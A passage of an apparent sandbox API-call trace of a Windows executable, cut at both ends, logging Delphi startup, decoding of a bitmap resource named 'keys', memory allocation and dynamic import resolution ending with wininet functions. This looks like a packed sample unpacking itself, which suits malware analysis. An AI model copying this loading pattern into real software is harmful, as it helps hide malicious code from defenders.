Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x502ea [0076.976] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x610000 [0076.977] SetWindowLongA (hWnd=0x502ea, nIndex=-4, dwNewLong=6361071) returned 4222352 [0076.977] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x19fda0 | out: lpWndClass=0x19fda0) returned 0 [0076.977] RegisterClassA (lpWndClass=0x4796f8) returned 0xc1bf [0076.977] GetSystemMetrics (nIndex=0) returned 1440 [0076.977] GetSystemMetrics (nIndex=1) returned 900 [0076.977] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="Po-003785gmhn", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x3033a [0077.285] SetWindowLongA (hWnd=0x3033a, nIndex=-4, dwNewLong=6361058) returned 4222352 [0077.286] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0077.287] SendMessageA (hWnd=0x3033a, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0077.288] NtdllDefWindowProc_A (hWnd=0x3033a, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0077.291] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0077.292] SetClassLongA (hWnd=0x3033a, nIndex=-14, dwNewLong=65575) returned 0x0 [0077.293] GetSystemMenu (hWnd=0x3033a, bRevert=0) returned 0x6025d [0077.344] DeleteMenu (hMenu=0x6025d, uPosition=0xf030, uFlags=0x0) returned 1 [0077.344] DeleteMenu (hMenu=0x6025d, uPosition=0xf000, uFlags=0x0) returned 1 [0077.344] DeleteMenu (hMenu=0x6025d, uPosition=0xf010, uFlags=0x0) returned 1 [0077.345] GetKeyboardLayoutList (in: nBuff=64, lpList=0x19fd6c | out: lpList=0x19fd6c) returned 1 [0077.346] GetModuleHandleA (lpModuleName="USER32") returned 0x76300000 [0077.346] GetProcAddress (hModule=0x76300000, lpProcName="AnimateWindow") returned 0x76328ef0 [0077.346] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0x19ef20, cchBufferMax=4096 | out: lpBuffer="Alt+") returned 0x4 [0077.346] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0x19ef20, cchBufferMax=4096 | out: lpBuffer="Ctrl+") returned 0x5 [0077.346] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0x19ef20, cchBufferMax=4096 | out: lpBuffer="Shift+") returned 0x6 [0077.346] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0x19ef20, cchBufferMax=4096 | out: lpBuffer="Del") returned 0x3 [0077.346] LoadStringA (in: hInstance=0x400000, uID=0xff37, lpBuffer=0x19ef20, cchBufferMax=4096 | out: lpBuffer="Ins") returned 0x3 [0077.346] LoadStringA (in: hInstance=0x400000, uID=0xff36, lpBuffer=0x19ef20, cchBufferMax=4096 | out: lpBuffer="Down") returned 0x4 [0077.346] LoadStringA (in: hInstance=0x400000, uID=0xff35, lpBuffer=0x19ef20, cchBufferMax=4096 | out: lpBuffer="Right") returned 0x5 [0077.346] LoadStringA (in: hInstance=0x400000, uID=0xff34, lpBuffer=0x19ef20, cchBufferMax=4096 | out: lpBuffer="Up") returned 0x2 [0077.346] LoadStringA (in: hInstance=0x400000, uID=0xff33, lpBuffer=0x19ef20, cchBufferMax=4096 | out: lpBuffer="Left") returned 0x4 [0077.346] LoadStringA (in: hInstance=0x400000, uID=0xff32, lpBuffer=0x19ef20, cchBufferMax=4096 | out: lpBuffer="Home") returned 0x4 [0077.347] LoadStringA (in: hInstance=0x400000, uID=0xff31, lpBuffer=0x19ef20, cchBufferMax=4096 | out: lpBuffer="End") returned 0x3 [0077.347] LoadStringA (in: hInstance=0x400000, uID=0xff30, lpBuffer=0x19ef20, cchBufferMax=4096 | out: lpBuffer="PgDn") returned 0x4 [0077.347] LoadStringA (in: hInstance=0x400000, uID=0xff4f, lpBuffer=0x19ef20, cchBufferMax=4096 | out: lpBuffer="PgUp") returned 0x4 [0077.347] LoadStringA (in: hInstance=0x400000, uID=0xff4e, lpBuffer=0x19ef20, cchBufferMax=4096 | out: lpBuffer="Space") returned 0x5 [0077.347] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x19ef20, cchBufferMax=4096 | out: lpBuffer="Enter") returned 0x5 [0077.347] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x19ef20, cchBufferMax=4096 | out: lpBuffer="Esc") returned 0x3 [0077.347] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x19ef20, cchBufferMax=4096 | out: lpBuffer="Tab") returned 0x3 [0077.347] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x19ef20, cchBufferMax=4096 | out: lpBuffer="BkSp") returned 0x4 [0077.347] CompareStringA (Locale=0x800, dwCmpFlags=0x1, lpString1="TComponent", cchCount1=10, lpString2="TPersistent", cchCount2=11) returned 1 [0077.347] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6cc90000 [0077.348] GetProcAddress (hModule=0x6cc90000, lpProcName="InitializeFlatSB") returned 0x6ccbecf0 [0077.348] GetProcAddress (hModule=0x6cc90000, lpProcName="UninitializeFlatSB") returned 0x6ccbef90 [0077.348] GetProcAddress (hModule=0x6cc90000, lpProcName="FlatSB_GetScrollProp") returned 0x6ccbbf70 [0077.348] GetProcAddress (hModule=0x6cc90000, lpProcName="FlatSB_SetScrollProp") returned 0x6ccbe6f0 [0077.348] GetProcAddress (hModule=0x6cc90000, lpProcName="FlatSB_EnableScrollBar") returned 0x6ccbbd70 [0077.348] GetProcAddress (hModule=0x6cc90000, lpProcName="FlatSB_ShowScrollBar") returned 0x6ccbea50 [0077.348] GetProcAddress (hModule=0x6cc90000, lpProcName="FlatSB_GetScrollRange") returned 0x6ccbc0e0 [0077.349] GetProcAddress (hModule=0x6cc90000, lpProcName="FlatSB_GetScrollInfo") returned 0x6ccbbe20 [0077.349] GetProcAddress (hModule=0x6cc90000, lpProcName="FlatSB_GetScrollPos") returned 0x6ccbbf10 [0077.349] GetProcAddress (hModule=0x6cc90000, lpProcName="FlatSB_SetScrollPos") returned 0x6ccbe660 [0077.349] GetProcAddress (hModule=0x6cc90000, lpProcName="FlatSB_SetScrollInfo") returned 0x6ccbe590 [0077.349] GetProcAddress (hModule=0x6cc90000, lpProcName="FlatSB_SetScrollRange") returned 0x6ccbe960 [0077.349] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc0d6 [0077.349] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc158 [0077.349] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc1c0 [0077.349] GetCurrentThreadId () returned 0x12c4 [0077.349] GlobalAddAtomA (lpString="WndProcPtr00400000000012C4") returned 0xc087 [0077.350] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc150 [0077.350] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc1d5 [0077.350] GetModuleHandleA (lpModuleName="User32.dll") returned 0x76300000 [0077.350] GetProcAddress (hModule=0x76300000, lpProcName="SetLayeredWindowAttributes") returned 0x7633cbc0 [0077.350] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc0d6 [0077.350] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x19ef20, cchBufferMax=4096 | out: lpBuffer="UTF-7") returned 0x5 [0077.350] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x19ef20, cchBufferMax=4096 | out: lpBuffer="UTF-8") returned 0x5 [0077.350] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x19ef20, cchBufferMax=4096 | out: lpBuffer="Big Endian Unicode") returned 0x12 [0077.350] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x19ef20, cchBufferMax=4096 | out: lpBuffer="Unicode") returned 0x7 [0077.350] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x19ef20, cchBufferMax=4096 | out: lpBuffer="ASCII") returned 0x5 [0077.350] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x19ef20, cchBufferMax=4096 | out: lpBuffer="ANSI") returned 0x4 [0077.350] GetDC (hWnd=0x0) returned 0xb010541 [0077.351] GetDeviceCaps (hdc=0xb010541, index=12) returned 32 [0077.351] GetDeviceCaps (hdc=0xb010541, index=14) returned 1 [0077.351] ReleaseDC (hWnd=0x0, hDC=0xb010541) returned 1 [0077.351] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x19ef14, cchBufferMax=4096 | out: lpBuffer="JPEG Image File") returned 0xf [0077.351] LoadStringA (in: hInstance=0x400000, uID=0xff57, lpBuffer=0x19eeb4, cchBufferMax=4096 | out: lpBuffer="Metafiles") returned 0x9 [0077.352] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3 [0077.352] LoadStringA (in: hInstance=0x400000, uID=0xff58, lpBuffer=0x19eeb4, cchBufferMax=4096 | out: lpBuffer="Enhanced Metafiles") returned 0x12 [0077.352] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3 [0077.352] LoadStringA (in: hInstance=0x400000, uID=0xff59, lpBuffer=0x19eeb4, cchBufferMax=4096 | out: lpBuffer="Icons") returned 0x5 [0077.352] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0077.352] LoadStringA (in: hInstance=0x400000, uID=0xff5a, lpBuffer=0x19eeb4, cchBufferMax=4096 | out: lpBuffer="Bitmaps") returned 0x7 [0077.352] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3 [0077.352] CharLowerBuffA (in: lpsz="jpeg", cchLength=0x4 | out: lpsz="jpeg") returned 0x4 [0077.352] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x19ef14, cchBufferMax=4096 | out: lpBuffer="JPEG Image File") returned 0xf [0077.352] CharLowerBuffA (in: lpsz="jpg", cchLength=0x3 | out: lpsz="jpg") returned 0x3 [0077.352] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76b10000 [0077.352] GetProcAddress (hModule=0x76b10000, lpProcName="CoCreateInstanceEx") returned 0x76e65bc0 [0077.353] GetProcAddress (hModule=0x76b10000, lpProcName="CoInitializeEx") returned 0x76df88d0 [0077.353] GetProcAddress (hModule=0x76b10000, lpProcName="CoAddRefServerProcess") returned 0x76e70d30 [0077.353] GetProcAddress (hModule=0x76b10000, lpProcName="CoReleaseServerProcess") returned 0x76e73950 [0077.353] GetProcAddress (hModule=0x76b10000, lpProcName="CoResumeClassObjects") returned 0x76e798c0 [0077.353] GetProcAddress (hModule=0x76b10000, lpProcName="CoSuspendClassObjects") returned 0x76de2d80 [0077.353] SetErrorMode (uMode=0x8000) returned 0x0 [0077.353] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x6cc10000 [0077.627] SetErrorMode (uMode=0x0) returned 0x8000 [0077.627] GetProcAddress (hModule=0x6cc10000, lpProcName="OleCreatePropertyFrame") returned 0x6cc12320 [0077.627] GetProcAddress (hModule=0x6cc10000, lpProcName="OleCreateFontIndirect") returned 0x6cc12240 [0077.627] GetProcAddress (hModule=0x6cc10000, lpProcName="OleCreatePictureIndirect") returned 0x6cc12280 [0077.627] GetProcAddress (hModule=0x6cc10000, lpProcName="OleLoadPicture") returned 0x6cc122d0 [0077.627] InetIsOffline () returned 0x0 [0079.880] FindResourceA (hModule=0x400000, lpName="keys", lpType=0x2) returned 0x48c810 [0079.880] LoadResource (hModule=0x400000, hResInfo=0x48c810) returned 0x4a7d80 [0079.880] SizeofResource (hModule=0x400000, hResInfo=0x48c810) returned 0x506e0 [0079.880] LockResource (hResData=0x4a7d80) returned 0x4a7d80 [0079.880] GetDC (hWnd=0x0) returned 0xb010541 [0079.880] CreateDIBSection (in: hdc=0xb010541, lpbmi=0x256da50, usage=0x0, ppvBits=0x19fedc, hSection=0x0, offset=0x0 | out: ppvBits=0x19fedc) returned 0x55050928 [0079.891] ReleaseDC (hWnd=0x0, hDC=0xb010541) returned 1 [0079.892] GetObjectA (in: h=0x55050928, c=84, pv=0x19fe54 | out: pv=0x19fe54) returned 84 [0079.892] CreateCompatibleDC (hdc=0x0) returned 0x6f0106f0 [0079.892] SelectObject (hdc=0x6f0106f0, h=0x55050928) returned 0x185000f [0079.892] GetDIBColorTable (in: hdc=0x6f0106f0, iStart=0x0, cEntries=0x100, prgbq=0x19fa0c | out: prgbq=0x19fa0c) returned 0x0 [0079.892] SelectObject (hdc=0x6f0106f0, h=0x185000f) returned 0x55050928 [0079.892] DeleteDC (hdc=0x6f0106f0) returned 1 [0079.892] GetDC (hWnd=0x0) returned 0xb010541 [0079.892] GetDeviceCaps (hdc=0xb010541, index=12) returned 32 [0079.892] GetDeviceCaps (hdc=0xb010541, index=14) returned 1 [0079.892] ReleaseDC (hWnd=0x0, hDC=0xb010541) returned 1 [0079.894] FreeResource (hResData=0x4a7d80) returned 0 [0079.894] GdiFlush () returned 1 [0079.894] GdiFlush () returned 1 [0079.895] GdiFlush () returned 1 [0079.895] GdiFlush () returned 1 [0079.897] GdiFlush () returned 1 [0079.898] GdiFlush () returned 1 [0079.900] GdiFlush () returned 1 [0079.901] GdiFlush () returned 1 [0079.902] GdiFlush () returned 1 [0080.010] GdiFlush () returned 1 [0080.011] GdiFlush () returned 1 [0080.012] GdiFlush () returned 1 [0080.012] GdiFlush () returned 1 [0080.014] GdiFlush () returned 1 [0080.015] GdiFlush () returned 1 [0080.016] GdiFlush () returned 1 [0080.017] GdiFlush () returned 1 [0080.018] GdiFlush () returned 1 [0080.020] GdiFlush () returned 1 [0080.021] GdiFlush () returned 1 [0080.022] GdiFlush () returned 1 [0080.082] GdiFlush () returned 1 [0080.086] GdiFlush () returned 1 [0080.088] GdiFlush () returned 1 [0080.090] GdiFlush () returned 1 [0080.093] GdiFlush () returned 1 [0080.095] GdiFlush () returned 1 [0080.097] GdiFlush () returned 1 [0080.109] GdiFlush () returned 1 [0080.111] GdiFlush () returned 1 [0080.113] GdiFlush () returned 1 [0080.115] GdiFlush () returned 1 [0080.117] GdiFlush () returned 1 [0080.119] GdiFlush () returned 1 [0080.121] GdiFlush () returned 1 [0080.247] GdiFlush () returned 1 [0080.249] GdiFlush () returned 1 [0080.252] GdiFlush () returned 1 [0080.254] GdiFlush () returned 1 [0080.256] GdiFlush () returned 1 [0080.262] GdiFlush () returned 1 [0080.266] GdiFlush () returned 1 [0080.269] GdiFlush () returned 1 [0080.272] GdiFlush () returned 1 [0080.285] GdiFlush () returned 1 [0080.288] GdiFlush () returned 1 [0080.291] GdiFlush () returned 1 [0080.409] GdiFlush () returned 1 [0080.413] GdiFlush () returned 1 [0080.416] GdiFlush () returned 1 [0080.427] GdiFlush () returned 1 [0080.431] GdiFlush () returned 1 [0080.434] GdiFlush () returned 1 [0080.438] GdiFlush () returned 1 [0080.441] GdiFlush () returned 1 [0080.445] GdiFlush () returned 1 [0080.448] GdiFlush () returned 1 [0080.490] GdiFlush () returned 1 [0080.494] GdiFlush () returned 1 [0080.497] GdiFlush () returned 1 [0080.501] GdiFlush () returned 1 [0080.506] GdiFlush () returned 1 [0080.512] GdiFlush () returned 1 [0080.515] GdiFlush () returned 1 [0080.519] GdiFlush () returned 1 [0080.524] GdiFlush () returned 1 [0080.541] GdiFlush () returned 1 [0080.545] GdiFlush () returned 1 [0080.549] GdiFlush () returned 1 [0080.554] GdiFlush () returned 1 [0080.558] GdiFlush () returned 1 [0080.563] GdiFlush () returned 1 [0080.568] GdiFlush () returned 1 [0080.573] GdiFlush () returned 1 [0080.582] GdiFlush () returned 1 [0080.587] GdiFlush () returned 1 [0080.592] GdiFlush () returned 1 [0080.602] GdiFlush () returned 1 [0080.606] GdiFlush () returned 1 [0080.611] GdiFlush () returned 1 [0080.617] GdiFlush () returned 1 [0080.626] GdiFlush () returned 1 [0080.633] GdiFlush () returned 1 [0080.642] GdiFlush () returned 1 [0080.648] GdiFlush () returned 1 [0080.654] GdiFlush () returned 1 [0080.675] GdiFlush () returned 1 [0080.717] GdiFlush () returned 1 [0080.723] GdiFlush () returned 1 [0080.729] GdiFlush () returned 1 [0080.734] GdiFlush () returned 1 [0080.746] GdiFlush () returned 1 [0080.752] GdiFlush () returned 1 [0080.812] GdiFlush () returned 1 [0080.820] GdiFlush () returned 1 [0080.828] GdiFlush () returned 1 [0080.841] GdiFlush () returned 1 [0080.860] GdiFlush () returned 1 [0080.866] GdiFlush () returned 1 [0080.872] GdiFlush () returned 1 [0080.877] GdiFlush () returned 1 [0080.882] GdiFlush () returned 1 [0080.887] GdiFlush () returned 1 [0080.892] GdiFlush () returned 1 [0080.898] GdiFlush () returned 1 [0080.903] GdiFlush () returned 1 [0080.908] GdiFlush () returned 1 [0080.914] GdiFlush () returned 1 [0080.920] GdiFlush () returned 1 [0080.926] GdiFlush () returned 1 [0080.933] GdiFlush () returned 1 [0080.937] DeleteObject (ho=0x55050928) returned 1 [0080.939] VirtualAlloc (lpAddress=0x0, dwSize=0x1b000, flAllocationType=0x2000, flProtect=0x1) returned 0x20b0000 [0080.939] VirtualAlloc (lpAddress=0x20b1000, dwSize=0x13010, flAllocationType=0x1000, flProtect=0x4) returned 0x20b1000 [0080.940] VirtualAlloc (lpAddress=0x20c5000, dwSize=0x5b8, flAllocationType=0x1000, flProtect=0x4) returned 0x20c5000 [0080.940] VirtualAlloc (lpAddress=0x20c6000, dwSize=0xc41, flAllocationType=0x1000, flProtect=0x4) returned 0x20c6000 [0080.940] VirtualAlloc (lpAddress=0x20c7000, dwSize=0xbb2, flAllocationType=0x1000, flProtect=0x4) returned 0x20c7000 [0080.941] VirtualAlloc (lpAddress=0x20c8000, dwSize=0x1814, flAllocationType=0x1000, flProtect=0x4) returned 0x20c8000 [0080.941] VirtualAlloc (lpAddress=0x20ca000, dwSize=0x10, flAllocationType=0x1000, flProtect=0x4) returned 0x20ca000 [0080.941] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74530000 [0080.941] GetProcAddress (hModule=0x74530000, lpProcName="DeleteCriticalSection") returned 0x772b0e60 [0080.941] GetProcAddress (hModule=0x74530000, lpProcName="LeaveCriticalSection") returned 0x7729f210 [0080.941] GetProcAddress (hModule=0x74530000, lpProcName="EnterCriticalSection") returned 0x7729f290 [0080.942] GetProcAddress (hModule=0x74530000, lpProcName="InitializeCriticalSection") returned 0x772ba200 [0080.942] GetProcAddress (hModule=0x74530000, lpProcName="VirtualFree") returned 0x74547600 [0080.942] GetProcAddress (hModule=0x74530000, lpProcName="VirtualAlloc") returned 0x74547810 [0080.942] GetProcAddress (hModule=0x74530000, lpProcName="LocalFree") returned 0x745479a0 [0080.942] GetProcAddress (hModule=0x74530000, lpProcName="LocalAlloc") returned 0x74547a30 [0080.942] GetProcAddress (hModule=0x74530000, lpProcName="GetTickCount") returned 0x74555eb0 [0080.942] GetProcAddress (hModule=0x74530000, lpProcName="QueryPerformanceCounter") returned 0x745438a0 [0080.942] GetProcAddress (hModule=0x74530000, lpProcName="GetVersion") returned 0x7454aaf0 [0080.942] GetProcAddress (hModule=0x74530000, lpProcName="GetCurrentThreadId") returned 0x74541b90 [0080.942] GetProcAddress (hModule=0x74530000, lpProcName="InterlockedDecrement") returned 0x74552a20 [0080.943] GetProcAddress (hModule=0x74530000, lpProcName="InterlockedIncrement") returned 0x74552a00 [0080.943] GetProcAddress (hModule=0x74530000, lpProcName="VirtualQuery") returned 0x74547a90 [0080.943] GetProcAddress (hModule=0x74530000, lpProcName="WideCharToMultiByte") returned 0x74543880 [0080.943] GetProcAddress (hModule=0x74530000, lpProcName="MultiByteToWideChar") returned 0x74542ad0 [0080.943] GetProcAddress (hModule=0x74530000, lpProcName="lstrlenA") returned 0x74548c80 [0080.943] GetProcAddress (hModule=0x74530000, lpProcName="lstrcpynA") returned 0x7454fe40 [0080.943] GetProcAddress (hModule=0x74530000, lpProcName="LoadLibraryExA") returned 0x7454a270 [0080.943] GetProcAddress (hModule=0x74530000, lpProcName="GetThreadLocale") returned 0x7454af90 [0080.943] GetProcAddress (hModule=0x74530000, lpProcName="GetStartupInfoA") returned 0x74549c10 [0080.943] GetProcAddress (hModule=0x74530000, lpProcName="GetProcAddress") returned 0x745478b0 [0080.944] GetProcAddress (hModule=0x74530000, lpProcName="GetModuleHandleA") returned 0x745499f0 [0080.944] GetProcAddress (hModule=0x74530000, lpProcName="GetModuleFileNameA") returned 0x7454a720 [0080.944] GetProcAddress (hModule=0x74530000, lpProcName="GetLocaleInfoA") returned 0x7454e7b0 [0080.944] GetProcAddress (hModule=0x74530000, lpProcName="GetLastError") returned 0x74543870 [0080.944] GetProcAddress (hModule=0x74530000, lpProcName="GetCommandLineA") returned 0x7454ab60 [0080.944] GetProcAddress (hModule=0x74530000, lpProcName="FreeLibrary") returned 0x74549f50 [0080.944] GetProcAddress (hModule=0x74530000, lpProcName="FindFirstFileA") returned 0x74556920 [0080.944] GetProcAddress (hModule=0x74530000, lpProcName="FindClose") returned 0x745568e0 [0080.944] GetProcAddress (hModule=0x74530000, lpProcName="ExitProcess") returned 0x74557b30 [0080.944] GetProcAddress (hModule=0x74530000, lpProcName="WriteFile") returned 0x74556ca0 [0080.945] GetProcAddress (hModule=0x74530000, lpProcName="UnhandledExceptionFilter") returned 0x74572670 [0080.945] GetProcAddress (hModule=0x74530000, lpProcName="SetFilePointer") returned 0x74556c40 [0080.945] GetProcAddress (hModule=0x74530000, lpProcName="SetEndOfFile") returned 0x74556c00 [0080.945] GetProcAddress (hModule=0x74530000, lpProcName="RtlUnwind") returned 0x74548c10 [0080.945] GetProcAddress (hModule=0x74530000, lpProcName="ReadFile") returned 0x74556bb0 [0080.945] GetProcAddress (hModule=0x74530000, lpProcName="RaiseException") returned 0x74548c20 [0080.945] GetProcAddress (hModule=0x74530000, lpProcName="GetStdHandle") returned 0x7454a6e0 [0080.945] GetProcAddress (hModule=0x74530000, lpProcName="GetFileSize") returned 0x74556a70 [0080.945] GetProcAddress (hModule=0x74530000, lpProcName="GetFileType") returned 0x74556aa0 [0080.945] GetProcAddress (hModule=0x74530000, lpProcName="CreateFileA") returned 0x74556880 [0080.946] GetProcAddress (hModule=0x74530000, lpProcName="CloseHandle") returned 0x74556630 [0080.946] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76300000 [0080.946] GetProcAddress (hModule=0x76300000, lpProcName="GetKeyboardType") returned 0x7635cd00 [0080.946] GetProcAddress (hModule=0x76300000, lpProcName="LoadStringA") returned 0x7632fd20 [0080.946] GetProcAddress (hModule=0x76300000, lpProcName="MessageBoxA") returned 0x7637fec0 [0080.946] GetProcAddress (hModule=0x76300000, lpProcName="CharNextA") returned 0x7632e240 [0080.946] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76a90000 [0080.946] GetProcAddress (hModule=0x76a90000, lpProcName="RegQueryValueExA") returned 0x76aaf500 [0080.946] GetProcAddress (hModule=0x76a90000, lpProcName="RegOpenKeyExA") returned 0x76aaf790 [0080.946] GetProcAddress (hModule=0x76a90000, lpProcName="RegCloseKey") returned 0x76aaf620 [0080.946] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x743f0000 [0080.947] GetProcAddress (hModule=0x743f0000, lpProcName="SysFreeString") returned 0x74409d40 [0080.947] GetProcAddress (hModule=0x743f0000, lpProcName="SysReAllocStringLen") returned 0x744049e0 [0080.947] GetProcAddress (hModule=0x743f0000, lpProcName="SysAllocStringLen") returned 0x74409c00 [0080.947] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74530000 [0080.947] GetProcAddress (hModule=0x74530000, lpProcName="TlsSetValue") returned 0x745429d0 [0080.947] GetProcAddress (hModule=0x74530000, lpProcName="TlsGetValue") returned 0x74541b70 [0080.947] GetProcAddress (hModule=0x74530000, lpProcName="TlsFree") returned 0x7454a040 [0080.947] GetProcAddress (hModule=0x74530000, lpProcName="TlsAlloc") returned 0x7454a120 [0080.948] GetProcAddress (hModule=0x74530000, lpProcName="LocalFree") returned 0x745479a0 [0080.948] GetProcAddress (hModule=0x74530000, lpProcName="LocalAlloc") returned 0x74547a30 [0080.948] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74530000 [0080.948] GetProcAddress (hModule=0x74530000, lpProcName="lstrcmpiA") returned 0x74547830 [0080.948] GetProcAddress (hModule=0x74530000, lpProcName="WriteFile") returned 0x74556ca0 [0080.948] GetProcAddress (hModule=0x74530000, lpProcName="WaitForSingleObject") returned 0x74556820 [0080.948] GetProcAddress (hModule=0x74530000, lpProcName="VirtualQuery") returned 0x74547a90 [0080.948] GetProcAddress (hModule=0x74530000, lpProcName="VirtualProtect") returned 0x74547a50 [0080.948] GetProcAddress (hModule=0x74530000, lpProcName="VirtualAlloc") returned 0x74547810 [0080.948] GetProcAddress (hModule=0x74530000, lpProcName="SetFilePointer") returned 0x74556c40 [0080.948] GetProcAddress (hModule=0x74530000, lpProcName="SetEvent") returned 0x745567d0 [0080.949] GetProcAddress (hModule=0x74530000, lpProcName="SetEndOfFile") returned 0x74556c00 [0080.949] GetProcAddress (hModule=0x74530000, lpProcName="ResetEvent") returned 0x745567c0 [0080.949] GetProcAddress (hModule=0x74530000, lpProcName="ReadFile") returned 0x74556bb0 [0080.949] GetProcAddress (hModule=0x74530000, lpProcName="LoadLibraryA") returned 0x74554bf0 [0080.949] GetProcAddress (hModule=0x74530000, lpProcName="LeaveCriticalSection") returned 0x7729f210 [0080.949] GetProcAddress (hModule=0x74530000, lpProcName="InitializeCriticalSection") returned 0x772ba200 [0080.949] GetProcAddress (hModule=0x74530000, lpProcName="GetVersionExA") returned 0x7454a700 [0080.949] GetProcAddress (hModule=0x74530000, lpProcName="GetThreadLocale") returned 0x7454af90 [0080.949] GetProcAddress (hModule=0x74530000, lpProcName="GetStringTypeExA") returned 0x7454fe60 [0080.950] GetProcAddress (hModule=0x74530000, lpProcName="GetStdHandle") returned 0x7454a6e0 [0080.950] GetProcAddress (hModule=0x74530000, lpProcName="GetProcAddress") returned 0x745478b0 [0080.950] GetProcAddress (hModule=0x74530000, lpProcName="GetModuleHandleA") returned 0x745499f0 [0080.950] GetProcAddress (hModule=0x74530000, lpProcName="GetModuleFileNameA") returned 0x7454a720 [0080.950] GetProcAddress (hModule=0x74530000, lpProcName="GetLocaleInfoA") returned 0x7454e7b0 [0080.950] GetProcAddress (hModule=0x74530000, lpProcName="GetLocalTime") returned 0x74549be0 [0080.950] GetProcAddress (hModule=0x74530000, lpProcName="GetLastError") returned 0x74543870 [0080.950] GetProcAddress (hModule=0x74530000, lpProcName="GetFullPathNameA") returned 0x74556ad0 [0080.950] GetProcAddress (hModule=0x74530000, lpProcName="GetDiskFreeSpaceA") returned 0x745569c0 [0080.950] GetProcAddress (hModule=0x74530000, lpProcName="GetDateFormatA") returned 0x74570de0 [0080.951] GetProcAddress (hModule=0x74530000, lpProcName="GetCurrentThreadId") returned 0x74541b90 [0080.951] GetProcAddress (hModule=0x74530000, lpProcName="GetCPInfo") returned 0x7454a290 [0080.951] GetProcAddress (hModule=0x74530000, lpProcName="GetACP") returned 0x74548500 [0080.951] GetProcAddress (hModule=0x74530000, lpProcName="FormatMessageA") returned 0x7454f830 [0080.951] GetProcAddress (hModule=0x74530000, lpProcName="EnumCalendarInfoA") returned 0x7454fdf0 [0080.951] GetProcAddress (hModule=0x74530000, lpProcName="EnterCriticalSection") returned 0x7729f290 [0080.951] GetProcAddress (hModule=0x74530000, lpProcName="DeleteCriticalSection") returned 0x772b0e60 [0080.951] GetProcAddress (hModule=0x74530000, lpProcName="CreateFileA") returned 0x74556880 [0080.951] GetProcAddress (hModule=0x74530000, lpProcName="CreateEventA") returned 0x74556680 [0080.951] GetProcAddress (hModule=0x74530000, lpProcName="CompareStringA") returned 0x7454e1c0 [0080.952] GetProcAddress (hModule=0x74530000, lpProcName="CloseHandle") returned 0x74556630 [0080.952] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76300000 [0080.952] GetProcAddress (hModule=0x76300000, lpProcName="TranslateMessage") returned 0x7631d9b0 [0080.952] GetProcAddress (hModule=0x76300000, lpProcName="MessageBoxA") returned 0x7637fec0 [0080.952] GetProcAddress (hModule=0x76300000, lpProcName="LoadStringA") returned 0x7632fd20 [0080.952] GetProcAddress (hModule=0x76300000, lpProcName="GetSystemMetrics") returned 0x76319160 [0080.952] GetProcAddress (hModule=0x76300000, lpProcName="GetMessageA") returned 0x7632e130 [0080.952] GetProcAddress (hModule=0x76300000, lpProcName="DispatchMessageA") returned 0x76336f10 [0080.952] GetProcAddress (hModule=0x76300000, lpProcName="CharNextA") returned 0x7632e240 [0080.952] GetProcAddress (hModule=0x76300000, lpProcName="CharToOemA") returned 0x76382cf0 [0080.952] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74530000 [0080.953] GetProcAddress (hModule=0x74530000, lpProcName="Sleep") returned 0x74547990 [0080.953] LoadLibraryA (lpLibFileName="winmm.dll") returned 0x6c370000 [0083.470] GetProcAddress (hModule=0x6c370000, lpProcName="timeSetEvent") returned 0x6c3736b0 [0083.470] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x701a0000 [0083.470] GetProcAddress (hModule=0x701a0000, lpProcName="InternetReadFile") returned 0x70227320 [0083.470] GetProcAddress (hModule=0x701a0000, 